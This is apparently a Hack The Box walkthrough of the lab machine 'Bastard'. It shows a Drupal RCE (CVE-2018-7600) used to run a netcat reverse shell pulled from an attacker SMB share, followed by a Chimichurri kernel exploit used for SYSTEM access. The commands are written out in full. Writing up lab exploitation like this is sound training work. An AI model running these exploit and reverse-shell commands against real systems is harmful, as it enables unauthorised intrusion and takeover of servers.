HTB Walkthrough : Bastard

Today we are going to solve a another Hackthebox retired machine called “Bastard” . This lab was designed by . So let jump into machine .

Level : Easy

Attacking Strategy

  • Networking Scanning
    • Nmap
  • Enumeration
    • Manual Enumeration of CMS
  • Exploitation
    • Drupal Exploit
  • Privilege Escalation
    • Kernel Exploit

Walkthrough

IP address : 10.129.145.159

We start our journey my doing the nmap scan with script and version scan which give us some information about open ports and service running on the target system .

Enumeration

nmap -sC -sV -p- 10.129.145.159

Nmap show some result with some service running on target like on port 80 HTTP service is running and on same time we can also get an idea that drupal 7 is running on . There are some other port is also open like 145 , 49154 .

Nmap scan report for 10.129.145.159
Host is up (0.17s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Now from the result we chose to go with port 80 that is drupal CMS so we start enumerating it , after some google we get know that by visiting to changelog page we can get some information .

here get the actual information about the version which is drupal 7.54 and with my past experience its directly exploitable .

After searching on internet i got a exploit , also we can use Metasploit also but we want to learn manual exploitation so we skip the Metasploit . Exploit is available on GitHub .

Exploitation

This particular version of drupal have remote code execution vulnerability . we get the user information from the exploit so we can confirm that exploit is working fine . Now all we have to figure out to get the reverse shell .

https://github.com/pimps/CVE-2018-7600
cd CVE-2018-7600
python drupa7-CVE-2018-7600.py http://10.129.145.159 -c whoami 

For reverse shell we use netcat binary and then use the temporary smb server using impacket and then by remote code execution vulnerability we make reverse connection to our kali machines . Netcat pre compiled binary is already available on kali linux under the location of /usr/share/window-binaries .

cp /usr/share/windows-binaries/nc.exe ./
sudo smbserver.py share .

once everything is setup its time to exploit the and get the initial foothold on the target machine .

python drupa7-CVE-2018-7600.py http://10.129.145.159 -c "\\\10.10.14.79\share\nc.exe -e cmd.exe 10.10.14.79 1234"
rlwrap nc -lnvp 1234

we got the reverse shell over netcat on port 1234 .

Privilege Escalation

since we get the inital foothold on target its time to elevate our privileges to administrative account . We check about the system information with window command “systeminfo” and here we get to know that system may be vulnerable to kernel exploit as there is no patch is installed and this machine is window server 2008 R2 . So for that we can use different tool like window exploit suggester or wesng and many more .

systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          15/5/2021, 11:15:16 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.573 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.599 MB
Virtual Memory: In Use:    496 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.145.159
                                 [02]: fe80::6ccc:55b:423f:1148
                                 [03]: dead:beef::6ccc:55b:423f:1148

To work on window exploit suggester we have to setup the virtual environment and then install some dependencies , for creating the virtual environment we used virtualenv program .

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
pip install virtualenv 
virtualenv -p python2 venv
source venv/bin/activate
pip install xlrd==1.2.0
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2021-05-15-mssb.xls --systeminfo ../systeminfo.txt 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

after some time , trying different kernel exploit we decide to try “Chimichurri” program which you can download from GitHub . We transfer this binary to victim machine using temp smb server .

cp ~/Downloads/Chimichurri.exe ./
sudo smbserver.py share .

so while we are trying to write the files on target system we didn’t have writing permission so we move to whitelisted placed like Temp,tasks directory .

cd "C:\windows\tasks"
copy \\10.10.14.79\share\Chimichurri.exe

After successfully transfer of binary its time to create reverse shell .

Chimichurri.exe 10.10.14.79 4444

finally we got the elevated shell and now its time to collect the gems or flags .

rlwrap nc -lvnp 4444
type "C:\Users\Administrator\Desktop\root.txt.txt"
type "C:\Users\dimitris\Desktop\user.txt"

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.